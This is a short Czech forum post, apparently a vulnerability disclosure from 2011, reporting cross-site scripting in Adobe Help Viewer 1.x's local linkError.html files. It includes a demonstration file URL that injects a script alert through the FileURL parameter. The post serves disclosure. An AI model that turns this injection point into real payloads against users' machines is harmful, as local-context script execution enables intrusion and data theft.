Adobe Help Viewer 1.x (XSS)

BugTrack

Adobe Help Viewer 1.x (XSS)#
Soubory linkError.html v podadresářích jednotlivých jazyků v adresáři C:/Program Files/Adobe/Adobe Help Viewer/1.1/Resources/xx/ umožňují spuštění skriptů v kontextu lokálního systému.

Demonstrace:
file://C:/Program%20Files/Adobe/Adobe%20Hel
p%20Viewer/1.1/Resources/cs/linkError.html?
FileURL=%3Cscript%3Ealert%28%22XSS%22%29%3C
/script%3E

----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem.
(odpovědět)
.cCuMiNn. | E-mail | Website | PGP25.3.2011 22:24

Zpět
 
 
 

 
BBCode